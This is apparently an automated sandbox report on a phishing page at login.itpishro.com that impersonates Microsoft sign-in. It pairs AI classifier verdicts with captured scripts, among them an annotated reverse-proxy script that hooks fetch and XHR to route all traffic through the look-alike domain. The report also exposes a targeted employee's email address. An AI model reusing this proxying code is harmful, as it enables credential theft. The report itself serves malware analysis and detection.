o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. 
Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://www.gstatic.com/recaptcha/releases/pPK749s... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a legitimate Google reCAPTCHA implementation, with no obvious malicious behaviors. It includes code related to analytics, telemetry, and DOM manipulation, but these are common practices for a reCAPTCHA widget. The code is also well-commented and licensed under the Apache 2.0 and MIT licenses, indicating it is likely part of a legitimate open-source project. Overall, this script poses a low risk and is likely used for its intended purpose of providing a reCAPTCHA challenge."
} |
(function(){/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright Google LLC
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.
Copyright The Closure Library Authors.
SPDX-License-Identifier: MIT
*/
/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
var T=function(){return[function(r,d,h,V,R,K,Y,S,N,D,F,E,l,B,C,m){return(r|32)==(((C=["fr","flat",2],r)-C[2]>>4||(m=new Promise(function(P){window.addEventListener("visibilitychange",P,{once:!0}),document.hidden||P()})),r-7>>4)||(E=[2654435761,0,"1"],Y.wb=K===void 0?!1:K,B=b[38](26,Y,V),N=g[16](55,B),Y[C[0]]=N.next().value,Y.C=N.next().value,Y.rI=N.next().value,Y.Zf=N.next().value,F=Y.R()[C[1]](Infinity),S=F.findIndex(function(P){return P instanceof dy&&k[17](15,P,h)==d}),l=g[9](5,F[S],lj,3,p[12](77)),
D=[n[48](22,Y[C[0]]),A[43](38,Y.rI,U[9](11,Y[C[0]]),E[0]),A[10](27,3,Y.rI,U[9](19,Y.rI),E[1]),A[10](28,3,Y.Zf,U[9](19,R),Y.bf),A[10](24,3,Y.Zf,U[9](35,Y.Zf),U[9](27,Y.rI)),T[11](20,T[26](64,h,l[h])),k[30](55,h,E[C[2]],F,Y,Y.Xa)],U[47](20,E[1],Y),m=D),r)&&(K=g[31](9,1,d,V+R,gy),Y=h.map(function(P,v){return K[v%K.length]}),m=p[30](28,0,Y,h)),m},function(r,d,h,V,R,K,Y,S,N){if(N=[75,"userAgent",46],(r&N[0])==r){a:{if(V=By.navigator)if(h=V[N[1]]){d=h;break a}d=""}S=d}if((r>>1&14)==((r|24)==r&&(p[48](18,
h.B),h.F=d),r-5&13||(V=e[48](10,d,h),S=V=="array"||V==d&&typeof h.length=="number"),2))a:{if(n[32](N[2])&&V!=="Silk"){if(!(Y=kG.brands.find(function(D){return D.brand===V}),Y)||!Y.version){S=NaN;break a}K=Y.version.split(".")}else{if((R=U[28](1,"OPR",h,d,"8.0",V),R)===""){S=NaN;break a}K=R.split(".")}S=K.length===0?NaN:Number(K[0])}return(r>>2&3)==3&&(Y=b[15](45,V,pZ(),h),S=function(D,F){return D=b[F=["concat",1,"reduce"],29](F[1],F[1],0,255,d+Y(),K),{rm:k[26](10,0,R[F[0]](D).map(function(E){return A[14](9,
0,E)})[F[2]](function(E,l){return E.xor(l)})),A0:D}}),S},function(r,d,h,V){return(r^25)<((r|(V=[37,28,27],5))>>4||(d=T[9](26,this.U),h=U[45](2,!1,V[1],this.U,d,!1)),V[0])&&r+4>=V[2]&&H.call(this,d),h},function(r,d,h,V,R,K){return(r+(R=[1,24,29],(r-2|7)<r&&(r-R[0]|55)>=r&&(K=sM(function(){return h().parent!=h()?!0:h().frameElement!=null?!0:!1},!0)),2)&R[2])>=r&&(r+5^28)<r&&(K=CZ(ij(d,h),V)),(r|32)==r&&H.call(this,d),(r|R[1])==r&&(K=function(Y,S,N,D,F,E,l,B,C){C=[5,"aO","push"],UM.length?(E=UM.pop(),
g[C[0]](4,E,S),e[8](63,void 0,S,void 0,Y,E.U),D=E):D=new vy(Y,S),F=D;try{l=new V,N=l[C[1]],p[18](25,null,h)(N,F),B=l}finally{F.U.clear(),F.J=-1,F.R=-1,UM.length<d&&UM[C[2]](F)}return B}),K},function(r,d,h,V,R,K,Y,S){if((S=["call",32,47],(r|1)&2)==2){K=["/m/04w67_",'<div class="',"TileSelectionStreetSign"],R=K[1]+p[40](S[2],"rc-imageselect-desc-no-canonical")+h;switch(A[18](56,V)?V.toString():V){case K[2]:R+="Tap the center of the <strong>street signs</strong>";break;case "/m/0k4j":R+="Tap the center of the <strong>cars</strong>";
break;case K[0]:R+="Tap the center of the <strong>mail boxes</strong>"}Y=$G(R+d)}if((r^30)>=20&&(r^25)<S[1])H[S[0]](this,d,0,"dresp");if((r|48)==r)H[S[0]](this,d);return Y},function(r,d,h,V,R,K,Y){if((r+5&7)==(((K=[1,2,"call"],r^7)&12)<5&&(r^32)>>4>=K[1]&&(Hy[K[2]](this,d),this.U=[[]],this.C=K[0]),K)[1]){R=[7,0,127],Wy(V);for(Wy(h);h>R[K[0]]||V>R[K[1]];)d.U.push(V&R[K[1]]|128),V=(V>>>R[0]|h<<25)>>>R[K[0]],h>>>=R[0];d.U.push(V)}if((r>>K[0]&11)==K[0])MB[K[2]](this,360,20);return Y},function(r,d,h,V,
R,K,Y,S,N){return((r|((r&46)==(r+5<(N=["J","U","hN"],23)&&(r^37)>=8&&(p[19](44,V),h=e[10](50,V,h),V[N[1]].has(h)&&(V.K=d,V[N[0]]-=V[N[1]].get(h).length,V[N[1]]["delete"](h))),r)&&(K=["n","waf",!0],R.B=Date.now(),X$=R.yM,R[N[0]]=U[32](32,R[N[1]])?new yx(R.yM,R.O,n[6](50,z1,R[N[1]])):new a9(R.yM,R.O),R[N[0]].R=A[27](4,9,R[N[2]]),p[41](2)?R[N[0]].u(n[9](83,"t",K[2],R),n[5](37,"-",R.id),!1):(R.K=p[19](76,0,K[2],V,R),V===1&&window.___grecaptcha_cfg[K[1]]&&window.___grecaptcha_cfg[K[1]].includes("session")&&
U[32](41,R[N[1]])&&e[34](41,5,K[0],R),U[32](33,R[ |
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://login.itpishro.com |
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | { "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'login.itpishro.com' does not match the legitimate domain 'microsoft.com'.", "The domain 'itpishro.com' does not have any known association with Microsoft.", "The presence of 'login' as a subdomain is a common tactic used in phishing to mimic legitimate login pages.", "The domain 'itpishro.com' could be a legitimate domain for another service, but it is not related to Microsoft, raising suspicion." ], "riskscore": 9}
Google indexed: False |
URL: login.itpishro.com
Brands: Microsoft
Input Fields: unknown |
URL: https://login.itpishro.com/?login_hint=lindsey.joh... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, obfuscated code/URLs, and redirects to suspicious domains. While some contextual factors like the use of trusted domains and analytics-like functionality may suggest legitimate intent, the overall level of suspicious activity is high enough to warrant a medium-to-high risk assessment."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/shared/1.0/","urlDefaultFavicon":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/login.srf?login_hint=lindsey.johnson%40yogiproducts.com\u0026client-request-id=7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://login.itpishro.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/sso?client-request-id=7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d","iwaSsoProbeUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/ssoprobe?client-request-id=7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d","iwaIFrameUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/iframe?client-request-id=7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/common/winauth/sso/edgeredirect?client-request-id=7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d\u0026origin=login.microsoftonline.com\u0026is_redirected=
1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":2001,"hpgact":2101,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeAHmWHEMW-vD3BkpxtSxEkYV4xEctXcq0I8Eha9LYyVuAVQSKHWMoBv_iZTLpMxIBoXnYZCyf5eJb1VBHbqm3D9yfI8tYa8tKFy_Ha5Zmrii_fQ_clbBAPhSXght9KiyCAIJFt0jZAN6eMrTwJ56CFvvsLs9oPnz4ELeZipx7QkoCudp6cGuIre58Vck03oK_yOd8h2wkvgjj220v2UxykyAA","canary":"AnSAjKRrNOwQtr8z9kd3q69ESJf66oy4Cn0D7ohySpw=0:1:CANARY:UBGr7oDq0LxvpzKZqBfP6p7QR5W5O2ZkhwoqxtxJyjQ=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"7b0eb783-5c45-4cc7-b0d8-020cf59d3f8d","sessionId":"b61181e2-84e9-42b4-9b06-beac63885d00","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://login.itpishro.com/common/instrumentation/reportpageload","dssostatus":"https://login.itpishro.com/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1,"_D0":1,"Full":1,"Win81":1,"RE_WebKit":1,"b":{"name":"Chrome","major":117,"minor":0},"os":{"name":"Windows","version":"10.0"},"V":"117.0"},"watson":{"url":"/common/handlers/watson","bundle":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/ests/2.1/content/cdnbundles/watson.min_q5ptmu8aniymd4ftuqdkda2.js","sbundle":"https://6161646 |
URL: https://login.itpishro.com/?login_hint=lindsey.joh... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It includes dynamic code manipulation, data exfiltration, and URL obfuscation, which are considered moderate-risk indicators. However, the script also appears to have some legitimate functionality, such as cookie handling and URL patching, which mitigates the overall risk. Further review may be necessary to determine the full context and intent of the script."
} |
/*
 * Analyst annotations on a captured sample: client-side script served by the
 * page at login.itpishro.com. The code itself is left as captured; only
 * comments are added.
 *
 * What the snippet does:
 *   - wraps XMLHttpRequest.prototype.send so every XHR carries a request
 *     header named "vfff9080" whose value is read from a cookie of the same
 *     name;
 *   - wraps window.fetch so that any request URL whose hostname does not
 *     contain "itpishro.com" is rewritten to <hex(hostname)>.itpishro.com.
 *
 * NOTE(review): this is consistent with a reverse-proxy (adversary-in-the-
 * middle) credential-phishing page that keeps all browser traffic on the
 * look-alike domain. The upstream side is not visible here, so confirm
 * against the network capture.
 *
 * Detection-relevant artifacts visible in this snippet: the "vfff9080"
 * header/cookie name, long all-hex DNS labels under itpishro.com, a
 * console.log of a typeof value on every fetch call, and the undeclared
 * assignments to dash_url, baseUrl and urlparts.
 */
(function(){
// Parses a URL by assigning it to a detached <a> element; callers read
// .hostname from the returned element. Relative URLs resolve against the
// current page, so they report the page's own hostname.
var getLocation = function(href) {
var l = document.createElement("a");
l.href = href;
return l;
};
// Hex-encodes a string character by character with no zero padding. For the
// printable ASCII characters of a hostname each character yields two hex
// digits, so the label can be decoded pairwise: the label
// 61616463646e2e6d736674617574682e6e6574 seen in this page's $Config decodes
// to "aadcdn.msftauth.net".
function encoderSub(str) {
var hex = '';
for(var i=0;i<str.length;i++) {
hex += ''+str.charCodeAt(i).toString(16);
}
return hex;
}
// Maps a hostname onto the proxy domain: hosts that already contain baseurl
// are returned as-is, anything else becomes "<hex(host)>.<baseurl>".
// dash_url is assigned without a declaration; no 'use strict' is visible in
// this snippet, so it presumably ends up as a property of window.
function setUrl(baseurl,host){
if(host.includes(baseurl)){
return host;
}
dash_url = encoderSub(host);
return dash_url + "." + baseurl;
}
// Rewrites an absolute URL so that it points at the proxy domain.
// The domain is hard-coded, and the test is a substring match on the
// hostname rather than a suffix match. Only an "https://" + hostname prefix
// is substituted (first occurrence, string pattern), and the scheme of the
// result follows the current page's location.protocol.
// baseUrl and urlparts are undeclared assignments as well (see setUrl).
function patch(url){
baseUrl = "itpishro.com";
urlparts = getLocation(url);
if(urlparts.hostname.includes(baseUrl)){
return url;
}
return url.replace("https://"+urlparts.hostname,location.protocol + "//"+setUrl(baseUrl,urlparts.hostname));
}
// Returns the value of the cookie named cname from document.cookie, or ""
// when no cookie with that name is present. The whole cookie string is
// URI-decoded before it is split on ';'.
function getCookie(cname) {
let name = cname + "=";
let decodedCookie = decodeURIComponent(document.cookie);
let ca = decodedCookie.split(';');
for(let i = 0; i <ca.length; i++) {
let c = ca[i];
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
return c.substring(name.length, c.length);
}
}
return "";
}
// XHR hook: the original send is kept in pSend and called after the extra
// header is set, so page code sees normal behaviour. Every XHR issued after
// this point carries the "vfff9080" header (empty string when the cookie is
// absent).
// NOTE(review): the header presumably lets the server side correlate XHR
// traffic with a victim session; the server is not visible here.
var pSend = window.XMLHttpRequest.prototype.send;
window.XMLHttpRequest.prototype.send = function() {
//add cookies
this.setRequestHeader("vfff9080", getCookie("vfff9080"));
return pSend.apply(this, [].slice.call(arguments));
};
// fetch hook: the native fetch is kept in constantMock. The first argument
// is rewritten through patch() before the call is forwarded: object
// arguments are rebuilt as a new Request with the patched .url, everything
// else is treated as a URL string. The typeof of the first argument is
// logged to the console on every call.
const constantMock = window.fetch;
window.fetch = function() {
console.log(typeof arguments[0]);
if(typeof arguments[0] == "object"){
arguments[0] = new Request(patch(arguments[0].url),arguments[0]);
// console.log(arguments[0]);
}
else{
arguments[0] = patch(arguments[0]);
}
// The forwarded call is wrapped in a new Promise. In the catch handler
// `response` is not defined in that scope (the parameter is `error`), so on
// a failed request the outer promise is never settled; the page then waits
// indefinitely instead of seeing the network error.
return new Promise((resolve, reject) => {
constantMock
.apply(this, arguments)
.then((response) => {
resolve(response);
})
.catch((error) => {
reject(response);
})
});
}
})();
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify you are human",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Success!",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.itpishro.com/?login_hint=lindsey.joh... Model: Joe Sandbox AI | ```json
{
"risk_score": 2,
"reasoning": "The script includes moderate-risk indicators such as aggressive DOM manipulation and error logging to potentially external sources. However, there are no high-risk behaviors like dynamic code execution or data exfiltration. The script appears to be part of a debugging or logging framework, which reduces the risk score."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("xintegrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"lindsey.johnson@yogiproducts.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"lindsey.johnson@yogiproducts.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'login.itpishro.com' does not match the legitimate domain for Microsoft.", "The domain 'itpishro.com' does not have any known association with Microsoft.", "The presence of a login page on a non-Microsoft domain is suspicious.", "The email domain 'yogiproducts.com' does not match the brand 'Microsoft', which could indicate a phishing attempt." ], "riskscore": 9}
Google indexed: False |
URL: login.itpishro.com
Brands: Microsoft
Input Fields: lindsey.johnson@yogiproducts.com |
URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'login.itpishro.com' does not match the legitimate domain for Microsoft.", "The domain 'itpishro.com' does not have any known association with Microsoft.", "The presence of a login page on a domain not associated with Microsoft is suspicious.", "The email domain 'yogiproducts.com' does not match the brand 'Microsoft', which could indicate a phishing attempt targeting users of Microsoft services." ], "riskscore": 9}
Google indexed: False |
URL: login.itpishro.com
Brands: Microsoft
Input Fields: lindsey.johnson@yogiproducts.com |
URL: https://itpishro.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://itpishro.com |